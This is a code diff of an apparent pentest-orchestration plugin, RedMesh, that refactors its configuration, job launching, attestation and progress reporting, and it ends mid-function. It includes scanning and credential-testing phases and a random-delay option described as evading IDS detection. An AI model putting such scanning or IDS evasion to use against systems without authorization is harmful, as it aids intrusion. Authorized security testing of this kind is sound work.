Human-readable phase labels for progress reporting +PHASE_LABELS = { + # blackbox + "port_scan": "Scanning ports", + "fingerprint": "Fingerprinting services", + "service_probes": "Running service probes", + "web_tests": "Testing web vulnerabilities", + "correlation": "Correlating findings", + # graybox + "preflight": "Checking target", + "authentication": "Authenticating", + "discovery": "Discovering routes", + "graybox_probes": "Running application 
probes", + "weak_auth": "Testing credentials", +} __VER__ = '0.9.0' -def _thread_phase(state): - """Determine which phase a single thread is currently in.""" - tests = set(state.get("completed_tests", [])) - if "correlation_completed" in tests: - return "done" - if "web_tests_completed" in tests: - return "correlation" - if "service_info_completed" in tests: - return "web_tests" - if "fingerprint_completed" in tests: - return "service_probes" - return "port_scan" - _CONFIG = { **BasePlugin.CONFIG, @@ -115,17 +153,35 @@ def _thread_phase(state): "RUN_MODE": RUN_MODE_SINGLEPASS, "MONITOR_INTERVAL": 60, # seconds between passes in continuous mode "MONITOR_JITTER": 5, # random jitter to avoid simultaneous CStore writes + "PROGRESS_PUBLISH_INTERVAL": 30, # seconds between live progress writes to CStore + "DISTRIBUTED_JOB_RECONCILIATION": { + "STARTUP_TIMEOUT": 45, # seconds to wait for worker-owned :live startup signal + "STALE_TIMEOUT": 120, # seconds before launcher treats worker :live as stale + "STALE_GRACE": 30, # extra grace before retrying a stale worker assignment + "MAX_REANNOUNCE_ATTEMPTS": 3, # bounded per-worker retries before terminal failure + }, + "ARCHIVE_VERIFY_RETRIES": 3, + "LLM_API_RETRIES": 2, + "NETWORK_CONCURRENCY_WARNING_THRESHOLD": 16, + "GRAYBOX_BUDGETS": { + "AUTH_ATTEMPTS": 10, + "ROUTE_DISCOVERY": 100, + "STATEFUL_ACTIONS": 1, + }, + "SCAN_TARGET_ALLOWLIST": [], # Dune sand walking - random delays between operations to evade IDS detection "SCAN_MIN_RND_DELAY": 0.0, # minimum delay in seconds (0 = disabled) "SCAN_MAX_RND_DELAY": 0.0, # maximum delay in seconds (0 = disabled) # LLM Agent API integration for auto-analysis - "LLM_AGENT_API_ENABLED": False, # Enable LLM-powered analysis + "LLM_AGENT": { + "ENABLED": False, # Enable LLM-powered analysis + "TIMEOUT": 120, # Timeout in seconds for LLM API calls + "AUTO_ANALYSIS_TYPE": "security_assessment", # Default analysis type + }, "LLM_AGENT_API_HOST": "127.0.0.1", # Host where LLM Agent API is 
running "LLM_AGENT_API_PORT": None, # Port for LLM Agent API (required if enabled) - "LLM_AGENT_API_TIMEOUT": 120, # Timeout in seconds for LLM API calls - "LLM_AUTO_ANALYSIS_TYPE": "security_assessment", # Default analysis type # Security hardening controls "REDACT_CREDENTIALS": True, # Strip passwords from persisted reports @@ -135,16 +191,19 @@ def _thread_phase(state): "SCANNER_USER_AGENT": "", # HTTP User-Agent (empty = default requests UA) # RedMesh attestation submission - "ATTESTATION_PRIVATE_KEY": "", - "ATTESTATION_ENABLED": True, - "ATTESTATION_MIN_SECONDS_BETWEEN_SUBMITS": 86400, + "ATTESTATION": { + "ENABLED": True, + "PRIVATE_KEY": "", + "MIN_SECONDS_BETWEEN_SUBMITS": 86400, + "RETRIES": 2, + }, 'VALIDATION_RULES': { **BasePlugin.CONFIG['VALIDATION_RULES'], }, } -class PentesterApi01Plugin(BasePlugin, _RedMeshLlmAgentMixin): +class PentesterApi01Plugin(BasePlugin, _RedMeshLlmAgentMixin, _AttestationMixin, _RiskScoringMixin, _ReportMixin, _LiveProgressMixin): """ RedMesh API plugin for orchestrating decentralized pentest jobs. 
@@ -166,6 +225,8 @@ class PentesterApi01Plugin(BasePlugin, _RedMeshLlmAgentMixin): """ CONFIG = _CONFIG REDMESH_ATTESTATION_DOMAIN = "0xced141225d43c56d8b224d12f0b9524a15dc86df0113c42ffa4bc859309e0d40" + REDMESH_ATTESTATION_NETWORK = "base-sepolia" + AUDIT_LOG_MAX_ENTRIES = 1000 def on_init(self): @@ -178,13 +239,20 @@ def on_init(self): """ super(PentesterApi01Plugin, self).on_init() self.__features = self._get_all_features() + self._validate_feature_catalog() # Track active and completed jobs by target self.scan_jobs = {} # target -> PentestJob instance self.completed_jobs_reports = {} # target -> final report dict self.lst_completed_jobs = [] # List of completed jobs - self._audit_log = [] # Structured audit event log + self._audit_log = deque(maxlen=self.AUDIT_LOG_MAX_ENTRIES) # Structured audit event log self.__last_checked_jobs = 0 self._last_progress_publish = 0 # timestamp of last live progress publish + self._progress_publish_interval = self._get_progress_publish_interval() + self._job_state_repository = JobStateRepository(self) + self._artifact_repository = ArtifactRepository(self) + self._active_execution_identities = {} # {job_id: (job_id, pass_nr, worker_addr, assignment_revision)} + self._execution_live_meta = {} # {job_id: startup metadata for worker-owned :live publishing} + self._last_worker_reconcile_check = 0 self._foreign_jobs_logged = set() # job IDs we already logged "no worker entry" for self.__warmupstart = self.time() self.__warmup_done = False @@ -198,6 +266,20 @@ def on_init(self): )) return + def _get_job_state_repository(self): + repo = self.__dict__.get("_job_state_repository") + if not isinstance(repo, JobStateRepository): + repo = JobStateRepository(self) + self._job_state_repository = repo + return repo + + def _get_artifact_repository(self): + repo = self.__dict__.get("_artifact_repository") + if not isinstance(repo, ArtifactRepository): + repo = ArtifactRepository(self) + self._artifact_repository = repo + return repo + def 
_setup_semaphore_env(self): """Set semaphore environment variables for paired plugins.""" @@ -267,246 +349,6 @@ def Pd(self, s, *args, score=-1, **kwargs): return - def _attestation_get_tenant_private_key(self): - private_key = self.cfg_attestation_private_key - if private_key: - private_key = private_key.strip() - if not private_key: - return None - return private_key - - @staticmethod - def _attestation_pack_cid_obfuscated(report_cid) -> str: - if not isinstance(report_cid, str) or len(report_cid.strip()) == 0: - return "0x" + ("00" * 10) - cid = report_cid.strip() - if len(cid) >= 10: - masked = cid[:5] + cid[-5:] - else: - masked = cid.ljust(10, "_") - safe = "".join(ch if 32 <= ord(ch) <= 126 else "_" for ch in masked)[:10] - data = safe.encode("ascii", errors="ignore") - if len(data) < 10: - data = data + (b"_" * (10 - len(data))) - return "0x" + data[:10].hex() - - @staticmethod - def _attestation_extract_host(target): - if not isinstance(target, str): - return None - target = target.strip() - if not target: - return None - if "://" in target: - parsed = urlparse(target) - if parsed.hostname: - return parsed.hostname - host = target.split("/", 1)[0] - if host.count(":") == 1 and "." in host: - host = host.split(":", 1)[0] - return host - - def _attestation_pack_ip_obfuscated(self, target) -> str: - host = self._attestation_extract_host(target) - if not host: - return "0x0000" - if ".." 
in host: - parts = host.split("..") - if len(parts) == 2 and all(part.isdigit() for part in parts): - first_octet = int(parts[0]) - last_octet = int(parts[1]) - if 0 <= first_octet <= 255 and 0 <= last_octet <= 255: - return f"0x{first_octet:02x}{last_octet:02x}" - try: - ip_obj = ipaddress.ip_address(host) - except Exception: - return "0x0000" - if ip_obj.version != 4: - return "0x0000" - octets = host.split(".") - first_octet = int(octets[0]) - last_octet = int(octets[-1]) - return f"0x{first_octet:02x}{last_octet:02x}" - - @staticmethod - def _attestation_pack_execution_id(job_id) -> str: - if not isinstance(job_id, str): - raise ValueError("job_id must be a string") - job_id = job_id.strip() - if len(job_id) != 8: - raise ValueError("job_id must be exactly 8 characters") - try: - data = job_id.encode("ascii") - except UnicodeEncodeError as exc: - raise ValueError("job_id must contain only ASCII characters") from exc - return "0x" + data.hex() - - - def _attestation_get_worker_eth_addresses(self, workers: dict) -> list[str]: - if not isinstance(workers, dict): - return [] - eth_addresses = [] - for node_addr in workers.keys(): - eth_addr = self.bc.node_addr_to_eth_addr(node_addr) - if not isinstance(eth_addr, str) or not eth_addr.startswith("0x"): - raise ValueError(f"Unable to convert worker node to EVM address: {node_addr}") - eth_addresses.append(eth_addr) - eth_addresses.sort() - return eth_addresses - - def _attestation_pack_node_hashes(self, workers: dict) -> str: - eth_addresses = self._attestation_get_worker_eth_addresses(workers) - if len(eth_addresses) == 0: - return "0x" + ("00" * 32) - digest = self.bc.eth_hash_message(types=["address[]"], values=[eth_addresses], as_hex=True) - if isinstance(digest, str) and digest.startswith("0x"): - return digest - return "0x" + str(digest) - - def _submit_redmesh_test_attestation(self, job_id: str, job_specs: dict, workers: dict, vulnerability_score=0, node_ips=None): - self.P(f"[ATTESTATION] Test attestation 
requested for job {job_id} (score={vulnerability_score})") - if not self.cfg_attestation_enabled: - self.P("[ATTESTATION] Attestation is disabled via config. Skipping.", color='y') - return None - tenant_private_key = self._attestation_get_tenant_private_key() - if tenant_private_key is None: - self.P( - "[ATTESTATION] Tenant private key is missing. " - "Expected env var 'R1EN_ATTESTATION_PRIVATE_KEY'. Skipping.", - color='y' - ) - return None - - run_mode = str(job_specs.get("run_mode", RUN_MODE_SINGLEPASS)).upper() - test_mode = 1 if run_mode == RUN_MODE_CONTINUOUS_MONITORING else 0 - node_count = len(workers) if isinstance(workers, dict) else 0 - target = job_specs.get("target") - execution_id = self._attestation_pack_execution_id(job_id) - report_cid = workers.get(self.ee_addr, {}).get("report_cid", None) #TODO: use the correct CID - node_eth_address = self.bc.eth_address - ip_obfuscated = self._attestation_pack_ip_obfuscated(target) - cid_obfuscated = self._attestation_pack_cid_obfuscated(report_cid) - - self.P( - f"[ATTESTATION] Submitting test attestation: job={job_id}, mode={'CONTINUOUS' if test_mode else 'SINGLEPASS'}, " - f"nodes={node_count}, score={vulnerability_score}, target={ip_obfuscated}, " - f"cid={cid_obfuscated}, sender={node_eth_address}" - ) - tx_hash = self.bc.submit_attestation( - function_name="submitRedmeshTestAttestation", - function_args=[ - test_mode, - node_count, - vulnerability_score, - execution_id, - ip_obfuscated, - cid_obfuscated, - ], - signature_types=["bytes32", "uint8", "uint16", "uint8", "bytes8", "bytes2", "bytes10"], - signature_values=[ - self.REDMESH_ATTESTATION_DOMAIN, - test_mode, - node_count, - vulnerability_score, - execution_id, - ip_obfuscated, - cid_obfuscated, - ], - tx_private_key=tenant_private_key, - ) - - # Obfuscate node IPs for attestation metadata - obfuscated_node_ips = [] - if node_ips: - for ip in node_ips: - obfuscated_node_ips.append(self._attestation_pack_ip_obfuscated(ip)) - - result = { - 
"job_id": job_id, - "tx_hash": tx_hash, - "test_mode": "C" if test_mode == 1 else "S", - "node_count": node_count, - "vulnerability_score": vulnerability_score, - "execution_id": execution_id, - "report_cid": report_cid, - "node_eth_address": node_eth_address, - "node_ips_obfuscated": obfuscated_node_ips, - } - self.P( - "Submitted RedMesh test attestation for " - f"{job_id} (tx: {tx_hash}, node: {node_eth_address}, score: {vulnerability_score})", - color='g' - ) - return result - - def _submit_redmesh_job_start_attestation(self, job_id: str, job_specs: dict, workers: dict): - self.P(f"[ATTESTATION] Job-start attestation requested for job {job_id}") - if not self.cfg_attestation_enabled: - self.P("[ATTESTATION] Attestation is disabled via config. Skipping.", color='y') - return None - tenant_private_key = self._attestation_get_tenant_private_key() - if tenant_private_key is None: - self.P( - "[ATTESTATION] Tenant private key is missing. " - "Expected env var 'R1EN_ATTESTATION_PRIVATE_KEY'. 
Skipping.", - color='y' - ) - return None - - run_mode = str(job_specs.get("run_mode", RUN_MODE_SINGLEPASS)).upper() - test_mode = 1 if run_mode == RUN_MODE_CONTINUOUS_MONITORING else 0 - node_count = len(workers) if isinstance(workers, dict) else 0 - target = job_specs.get("target") - execution_id = self._attestation_pack_execution_id(job_id) - node_eth_address = self.bc.eth_address - ip_obfuscated = self._attestation_pack_ip_obfuscated(target) - node_hashes = self._attestation_pack_node_hashes(workers) - - worker_addrs = list(workers.keys()) if isinstance(workers, dict) else [] - self.P( - f"[ATTESTATION] Submitting job-start attestation: job={job_id}, mode={'CONTINUOUS' if test_mode else 'SINGLEPASS'}, " - f"nodes={node_count}, target={ip_obfuscated}, node_hashes={node_hashes}, " - f"workers={worker_addrs}, sender={node_eth_address}" - ) - tx_hash = self.bc.submit_attestation( - function_name="submitRedmeshJobStartAttestation", - function_args=[ - test_mode, - node_count, - execution_id, - node_hashes, - ip_obfuscated, - ], - signature_types=["bytes32", "uint8", "uint16", "bytes8", "bytes32", "bytes2"], - signature_values=[ - self.REDMESH_ATTESTATION_DOMAIN, - test_mode, - node_count, - execution_id, - node_hashes, - ip_obfuscated, - ], - tx_private_key=tenant_private_key, - ) - - result = { - "job_id": job_id, - "tx_hash": tx_hash, - "test_mode": "C" if test_mode == 1 else "S", - "node_count": node_count, - "execution_id": execution_id, - "node_hashes": node_hashes, - "ip_obfuscated": ip_obfuscated, - "node_eth_address": node_eth_address, - } - self.P( - "Submitted RedMesh job-start attestation for " - f"{job_id} (tx: {tx_hash}, node: {node_eth_address}, node_count: {node_count})", - color='g' - ) - return result - - def __post_init(self): """ Perform warmup: reconcile existing jobs in CStore, migrate legacy keys, @@ -536,7 +378,7 @@ def __post_init(self): agg_report = self._get_aggregated_report(raw_report) our_worker["result"] = agg_report 
normalized_spec["workers"][self.ee_addr] = our_worker - self.chainstore_hset(hkey=self.cfg_instance_id, key=normalized_key, value=normalized_spec) + PentesterApi01Plugin._write_job_record(self, normalized_key, normalized_spec, context="warmup_repair") is_completed = all( worker.get("finished") for worker in normalized_spec.get("workers", {}).values() ) if normalized_spec.get("workers") else False @@ -566,31 +408,103 @@ def __post_init(self): - def _get_all_features(self, categs=False): + def _coerce_scan_type(self, scan_type=None): + """Normalize optional scan-type input to ScanType or None.""" + return coerce_scan_type(scan_type) + + + def _get_supported_features(self, scan_type=None, categs=False): """ - Discover all service and web test methods available to workers. + Discover executable features from registered worker classes. Parameters ---------- + scan_type : str | ScanType | None, optional + Limit discovery to one scan type when provided. categs : bool, optional If True, return a dict keyed by category; otherwise a flat list. - - Returns - ------- - dict | list - Mapping or list of method names prefixed with `_service_info_` / `_web_test_`. 
""" + normalized_scan_type = self._coerce_scan_type(scan_type) + worker_items = iter_scan_strategies(normalized_scan_type) + features = {} if categs else [] - PREFIXES = ["_service_info_", "_web_test_"] - for prefix in PREFIXES: - methods = [method for method in dir(PentestLocalWorker) if method.startswith(prefix)] + for _, strategy in worker_items: + worker_cls = strategy.worker_cls + worker_features = worker_cls.get_supported_features(categs=categs) if categs: - features[prefix[1:-1]] = methods + for category, methods in worker_features.items(): + bucket = features.setdefault(category, []) + for method in methods: + if method not in bucket: + bucket.append(method) else: - features.extend(methods) + for method in worker_features: + if method not in features: + features.append(method) return features + def _get_all_features(self, categs=False, scan_type=None): + """ + Discover all executable feature methods available to workers. + + Parameters + ---------- + categs : bool, optional + If True, return a dict keyed by category; otherwise a flat list. + scan_type : str | ScanType | None, optional + If provided, return features only for that scan type. + + Returns + ------- + dict | list + Mapping or list of executable feature method names. 
+ """ + return self._get_supported_features(scan_type=scan_type, categs=categs) + + + def _get_feature_catalog(self, scan_type=None): + """Return catalog items relevant to the requested scan type.""" + normalized_scan_type = self._coerce_scan_type(scan_type) + allowed_categories = None if normalized_scan_type is None else set( + get_scan_strategy(normalized_scan_type).catalog_categories + ) + + catalog = [] + for item in FEATURE_CATALOG: + if allowed_categories and item.get("category") not in allowed_categories: + continue + catalog.append(item) + return catalog + + + def _validate_feature_catalog(self): + """Fail fast if catalog methods reference non-executable worker capabilities.""" + supported_by_type = { + scan_type: set(self._get_supported_features(scan_type=scan_type)) + for scan_type, _ in iter_scan_strategies() + } + catalog_by_type = { + ScanType.NETWORK: self._get_feature_catalog(scan_type=ScanType.NETWORK), + ScanType.WEBAPP: self._get_feature_catalog(scan_type=ScanType.WEBAPP), + } + invalid = [] + for scan_type, catalog in catalog_by_type.items(): + supported = supported_by_type[scan_type] + for item in catalog: + missing = sorted(method for method in item.get("methods", []) if method not in supported) + if missing: + invalid.append({ + "scan_type": scan_type.value, + "feature_id": item.get("id"), + "missing_methods": missing, + }) + if invalid: + raise RuntimeError( + "Invalid FEATURE_CATALOG definitions: {}".format(self.json_dumps(invalid, indent=2)) + ) + + def _normalize_job_record(self, job_key, job_spec, migrate=False): """ Normalize a job record and optionally migrate legacy entries. 
@@ -624,14 +538,18 @@ def _normalize_job_record(self, job_key, job_spec, migrate=False): if not isinstance(workers, dict): workers = {} normalized["workers"] = workers + try: + normalized["job_revision"] = int(normalized.get("job_revision", 0) or 0) + except (TypeError, ValueError): + normalized["job_revision"] = 0 if migrate and job_key != job_id: - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=normalized) - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=None) + PentesterApi01Plugin._write_job_record(self, job_id, normalized, context="normalize_migrate") + PentesterApi01Plugin._delete_job_record(self, job_key) job_key = job_id return job_key, normalized - def _get_job_config(self, job_specs): + def _get_job_config(self, job_specs, resolve_secrets=False): """ Fetch the immutable job config from R1FS via job_config_cid. @@ -648,10 +566,13 @@ def _get_job_config(self, job_specs): cid = job_specs.get("job_config_cid") if not cid: return {} - config = self.r1fs.get_json(cid) - if config is None: + config_model = PentesterApi01Plugin._get_artifact_repository(self).get_job_config_model(job_specs) + if config_model is None: self.P(f"Failed to fetch job config from R1FS (CID: {cid})", color='r') return {} + config = config_model.to_dict() + if resolve_secrets: + return resolve_job_config_secrets(self, config, include_secret_metadata=False) return config @@ -680,6 +601,108 @@ def _get_worker_entry(self, job_id, job_spec): self.json_dumps(workers)), ) return worker_entry + + @staticmethod + def _get_worker_assignment_revision(worker_entry): + """Return a normalized per-worker assignment revision.""" + if not isinstance(worker_entry, dict): + return 1 + try: + return int(worker_entry.get("assignment_revision", 1) or 1) + except (TypeError, ValueError): + return 1 + + def _build_execution_identity(self, job_id, pass_nr, worker_addr, assignment_revision): + """Return the worker execution identity used for local idempotency.""" + return 
(job_id, int(pass_nr or 1), worker_addr, int(assignment_revision or 1)) + + def _get_active_execution_identity(self, job_id): + identities = getattr(self, "_active_execution_identities", None) + if isinstance(identities, dict): + return identities.get(job_id) + return None + + def _remember_execution_identity(self, job_id, execution_identity, started_at): + identities = getattr(self, "_active_execution_identities", None) + if not isinstance(identities, dict): + identities = {} + self._active_execution_identities = identities + identities[job_id] = execution_identity + + meta = getattr(self, "_execution_live_meta", None) + if not isinstance(meta, dict): + meta = {} + self._execution_live_meta = meta + _, pass_nr, _, assignment_revision = execution_identity + meta[job_id] = { + "pass_nr": pass_nr, + "assignment_revision_seen": assignment_revision, + "started_at": started_at, + "first_seen_live_at": started_at, + "last_seen_at": started_at, + } + + def _forget_execution_identity(self, job_id): + identities = getattr(self, "_active_execution_identities", None) + if isinstance(identities, dict): + identities.pop(job_id, None) + meta = getattr(self, "_execution_live_meta", None) + if isinstance(meta, dict): + meta.pop(job_id, None) + + def _publish_worker_startup_progress(self, job_id, job_specs, local_jobs, assignment_revision, started_at): + """Publish an immediate worker-owned :live startup record after launch.""" + live_repo = PentesterApi01Plugin._get_job_state_repository(self) + ee_addr = self.ee_addr + pass_nr = 1 + if isinstance(job_specs, dict): + pass_nr = job_specs.get("job_pass", 1) + + scan_type = "network" + ports_total = 0 + threads = {} + for tid, worker in (local_jobs or {}).items(): + worker_scan_type = worker.state.get("scan_type") + if worker_scan_type == "webapp": + scan_type = "webapp" + initial_ports = getattr(worker, "initial_ports", []) or [] + ports_total += len(initial_ports) + threads[tid] = { + "phase": "preflight" if worker_scan_type == 
"webapp" else "port_scan", + "ports_scanned": 0, + "ports_total": len(initial_ports), + "open_ports_found": [], + } + + phase = "preflight" if scan_type == "webapp" else "port_scan" + total_phases = len(GRAYBOX_PHASE_ORDER) if scan_type == "webapp" else len(PHASE_ORDER) + progress = WorkerProgress( + job_id=job_id, + worker_addr=ee_addr, + pass_nr=pass_nr, + assignment_revision_seen=assignment_revision, + progress=0.0, + phase=phase, + scan_type=scan_type, + phase_index=1, + total_phases=total_phases, + ports_scanned=0, + ports_total=ports_total, + open_ports_found=[], + completed_tests=[], + updated_at=started_at, + started_at=started_at, + first_seen_live_at=started_at, + last_seen_at=started_at, + finished=False, + threads=threads if len(threads) > 1 else None, + ) + live_repo.put_live_progress_model(progress) + self.P( + "[LIVE->CSTORE] Published worker startup " + f"job_id={job_id} worker={ee_addr} pass={pass_nr} " + f"rev={assignment_revision} phase={phase} key={job_id}:{ee_addr}" + ) def _launch_job( @@ -701,7 +724,7 @@ def _launch_job( scanner_user_agent="", ): """ - Launch local worker threads for a job by splitting the port range. + Compatibility wrapper around the extracted local launch service. Parameters ---------- @@ -738,78 +761,31 @@ def _launch_job( Raises ------ ValueError - When no ports are available or batches cannot be allocated. 
- """ - if excluded_features is None: - excluded_features = [] - if enabled_features is None: - enabled_features = [] - local_jobs = {} - ports = list(range(start_port, end_port + 1)) - batches = [] - if port_order == PORT_ORDER_SEQUENTIAL: - ports = sorted(ports) # redundant but explicit - else: - port_order = PORT_ORDER_SHUFFLE - random.shuffle(ports) - nr_ports = len(ports) - if nr_ports == 0: - raise ValueError("No ports available for local workers.") - nr_local_workers = max(1, min(nr_local_workers, nr_ports)) - base_chunk, remainder = divmod(nr_ports, nr_local_workers) - start = 0 - if exceptions is None: - exceptions = [] - for i in range(nr_local_workers): - chunk = base_chunk + (1 if i < remainder else 0) - end = start + chunk - batch = ports[start:end] - if batch: - batches.append(batch) - start = end - #endfor create batches - if not batches: - raise ValueError("Unable to allocate port batches to workers.") - if job_id not in self.scan_jobs: - self.scan_jobs[job_id] = {} - for i, batch in enumerate(batches): - try: - self.P("Launching {} requested by {} for target {} - {} ports. Port order {}".format( - job_id, network_worker_address, - target, len(batch), port_order - )) - batch_job = PentestLocalWorker( - owner=self, - local_id_prefix=str(i + 1), - target=target, - job_id=job_id, - initiator=network_worker_address, - exceptions=exceptions, - worker_target_ports=batch, - excluded_features=excluded_features, - enabled_features=enabled_features, - scan_min_delay=scan_min_delay, - scan_max_delay=scan_max_delay, - ics_safe_mode=ics_safe_mode, - scanner_identity=scanner_identity, - scanner_user_agent=scanner_user_agent, - ) - batch_job.start() - local_jobs[batch_job.local_worker_id] = batch_job - except Exception as exc: - self.P( - "Failed to launch batch local job for ports [{}-{}]. 
Port order {}: {}".format( - min(batch) if batch else "-", - max(batch) if batch else "-", - port_order, - exc - ), - color='r' - ) - #end for each batch launch a PentestLocalWorker - if not local_jobs: - raise ValueError("No local workers could be launched for the requested port range.") - return local_jobs + When the launch service cannot allocate or start local work. + """ + job_config = { + "scan_type": ScanType.NETWORK.value, + "exceptions": exceptions or [], + "port_order": port_order, + "excluded_features": excluded_features or [], + "enabled_features": enabled_features or [], + "scan_min_delay": scan_min_delay, + "scan_max_delay": scan_max_delay, + "ics_safe_mode": ics_safe_mode, + "scanner_identity": scanner_identity, + "scanner_user_agent": scanner_user_agent, + "nr_local_workers": nr_local_workers, + } + return launch_local_jobs( + self, + job_id=job_id, + target=target, + launcher=network_worker_address, + start_port=start_port, + end_port=end_port, + job_config=job_config, + nr_local_workers_override=nr_local_workers, + ) def _maybe_launch_jobs(self, nr_local_workers=None): """ @@ -856,6 +832,7 @@ def _maybe_launch_jobs(self, nr_local_workers=None): # Our worker entry was reset by launcher for next pass - clear local state self.P(f"Detected worker reset for job {job_id}, clearing local tracking for next pass") self.completed_jobs_reports.pop(job_id, None) + self._forget_execution_identity(job_id) if job_id in self.lst_completed_jobs: self.lst_completed_jobs.remove(job_id) is_closed_target = False @@ -879,215 +856,57 @@ def _maybe_launch_jobs(self, nr_local_workers=None): if end_port is None: self.P("No end port specified, defaulting to 65535.") end_port = 65535 + pass_nr = job_specs.get("job_pass", 1) + assignment_revision = PentesterApi01Plugin._get_worker_assignment_revision(worker_entry) + execution_identity = PentesterApi01Plugin._build_execution_identity( + self, job_id, pass_nr, self.ee_addr, assignment_revision + ) + active_identity = 
PentesterApi01Plugin._get_active_execution_identity(self, job_id) + if active_identity == execution_identity: + self.P( + f"Skipping duplicate launch for active execution identity {execution_identity}", + color='y', + ) + continue # Fetch job config from R1FS - job_config = self._get_job_config(job_specs) - exceptions = job_config.get("exceptions", []) - if not isinstance(exceptions, list): - exceptions = [] - port_order = job_config.get("port_order", self.cfg_port_order) - excluded_features = job_config.get("excluded_features", self.cfg_excluded_features) - enabled_features = job_config.get("enabled_features", []) - scan_min_delay = job_config.get("scan_min_delay", self.cfg_scan_min_rnd_delay) - scan_max_delay = job_config.get("scan_max_delay", self.cfg_scan_max_rnd_delay) - ics_safe_mode = job_config.get("ics_safe_mode", self.cfg_ics_safe_mode) - scanner_identity = job_config.get("scanner_identity", self.cfg_scanner_identity) - scanner_user_agent = job_config.get("scanner_user_agent", self.cfg_scanner_user_agent) - workers_from_spec = job_config.get("nr_local_workers") - if nr_local_workers is not None: - workers_requested = nr_local_workers - elif workers_from_spec is not None and int(workers_from_spec) > 0: - workers_requested = int(workers_from_spec) - else: - workers_requested = self.cfg_nr_local_workers - self.P("Using {} local workers for job {}".format(workers_requested, job_id)) + job_config = self._get_job_config(job_specs, resolve_secrets=True) try: - local_jobs = self._launch_job( + local_jobs = launch_local_jobs( + self, job_id=job_id, target=target, + launcher=launcher, start_port=start_port, end_port=end_port, - network_worker_address=launcher, - nr_local_workers=workers_requested, - exceptions=exceptions, - port_order=port_order, - excluded_features=excluded_features, - enabled_features=enabled_features, - scan_min_delay=scan_min_delay, - scan_max_delay=scan_max_delay, - ics_safe_mode=ics_safe_mode, - scanner_identity=scanner_identity, - 
scanner_user_agent=scanner_user_agent, + job_config=job_config, + nr_local_workers_override=nr_local_workers, ) except ValueError as exc: self.P(f"Skipping job {job_id}: {exc}", color='r') worker_entry["finished"] = True worker_entry["error"] = str(exc) - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=job_specs) + PentesterApi01Plugin._write_job_record(self, job_id, job_specs, context="launch_error_value") + continue + except Exception as exc: + self.P(f"Skipping job {job_id}: {exc}", color='r') + worker_entry["finished"] = True + worker_entry["error"] = str(exc) + PentesterApi01Plugin._write_job_record(self, job_id, job_specs, context="launch_error_exception") continue + started_at = self.time() self.scan_jobs[job_id] = local_jobs + self._remember_execution_identity(job_id, execution_identity, started_at) + self._publish_worker_startup_progress( + job_id, + job_specs, + local_jobs, + assignment_revision=assignment_revision, + started_at=started_at, + ) #endif need to launch new job #end for each potential new job #endif it is time to check return - - - def _get_aggregated_report(self, local_jobs): - """ - Aggregate results from multiple local workers. - - Parameters - ---------- - local_jobs : dict - Mapping of worker id to result dicts. - - Returns - ------- - dict - Aggregated report with merged open ports, service info, etc. 
- """ - dct_aggregated_report = {} - type_or_func, field = None, None - try: - if local_jobs: - self.P(f"Aggregating reports from {len(local_jobs)} local jobs...") - for local_worker_id, local_job_status in local_jobs.items(): - aggregation_fields = PentestLocalWorker.get_worker_specific_result_fields() - for field in local_job_status: - if field not in dct_aggregated_report: - dct_aggregated_report[field] = local_job_status[field] - elif field in aggregation_fields: - type_or_func = aggregation_fields[field] - if field not in dct_aggregated_report: - field_type = type(local_job_status[field]) - dct_aggregated_report[field] = field_type() - #endif - if isinstance(dct_aggregated_report[field], list): - existing = set(dct_aggregated_report[field]) - merged = existing.union(local_job_status[field]) - try: - dct_aggregated_report[field] = sorted(merged) - except TypeError: - dct_aggregated_report[field] = list(merged) - elif isinstance(dct_aggregated_report[field], dict): - dct_aggregated_report[field] = self.merge_objects_deep( - dct_aggregated_report[field], - local_job_status[field]) - else: - _existing = dct_aggregated_report[field] - _new = local_job_status[field] - dct_aggregated_report[field] = type_or_func([_existing, _new]) - # end if aggregation type - # end if standard (one time) or aggregated fields - # for each field in this local job - # for each local job - self.P(f"Report aggregation done.") - # endif we have local jobs - except Exception as exc: - self.P("Error during report aggregation: {}:\n{}\n{}\ntype_or_func={}, field={}".format( - exc, self.trace_info(), - self.json_dumps(dct_aggregated_report, indent=2), - type_or_func, field - )) - return dct_aggregated_report - - # todo: move to helper - def merge_objects_deep(self, obj_a, obj_b): - """ - Deeply merge two objects (dicts, lists, sets). - - Parameters - ---------- - obj_a : Any - First object. - obj_b : Any - Second object. - - Returns - ------- - Any - Merged object. 
- """ - if isinstance(obj_a, dict) and isinstance(obj_b, dict): - merged = dict(obj_a) - for key, value_b in obj_b.items(): - if key in merged: - merged[key] = self.merge_objects_deep(merged[key], value_b) - else: - merged[key] = value_b - return merged - elif isinstance(obj_a, list) and isinstance(obj_b, list): - try: - return list(set(obj_a).union(set(obj_b))) - except TypeError: - import json as _json - seen = set() - merged = [] - for item in obj_a + obj_b: - try: - key = _json.dumps(item, sort_keys=True, default=str) - except (TypeError, ValueError): - key = id(item) - if key not in seen: - seen.add(key) - merged.append(item) - return merged - elif isinstance(obj_a, set) and isinstance(obj_b, set): - return obj_a.union(obj_b) - else: - return obj_b # Prefer obj_b in case of conflict - - - def _redact_report(self, report): - """ - Redact credentials from a report before persistence. - - Deep-copies the report and masks password values in findings and - accepted_credentials lists so that sensitive data is not written - to R1FS or CStore. - - Parameters - ---------- - report : dict - Aggregated scan report. - - Returns - ------- - dict - Redacted copy of the report. 
- """ - import re as _re - from copy import deepcopy - redacted = deepcopy(report) - service_info = redacted.get("service_info", {}) - for port_key, methods in service_info.items(): - if not isinstance(methods, dict): - continue - for method_key, method_data in methods.items(): - if not isinstance(method_data, dict): - continue - # Redact findings evidence - for finding in method_data.get("findings", []): - if not isinstance(finding, dict): - continue - evidence = finding.get("evidence", "") - if isinstance(evidence, str): - evidence = _re.sub( - r'(Accepted credential:\s*\S+?):(\S+)', - r'\1:***', evidence - ) - evidence = _re.sub( - r'(Accepted random creds\s*\S+?):(\S+)', - r'\1:***', evidence - ) - finding["evidence"] = evidence - # Redact accepted_credentials lists - creds = method_data.get("accepted_credentials", []) - if isinstance(creds, list): - method_data["accepted_credentials"] = [ - _re.sub(r'^(\S+?):(.+)$', r'\1:***', c) if isinstance(c, str) else c - for c in creds - ] - return redacted def _log_audit_event(self, event_type, details): @@ -1114,9 +933,223 @@ def _log_audit_event(self, event_type, details): } self.P(f"[AUDIT] {event_type}: {self.json_dumps(entry)}") self._audit_log.append(entry) - # Cap at 1000 entries to prevent memory bloat - if len(self._audit_log) > 1000: - self._audit_log = self._audit_log[-1000:] + return + + def _maybe_reannounce_worker_assignments(self): + 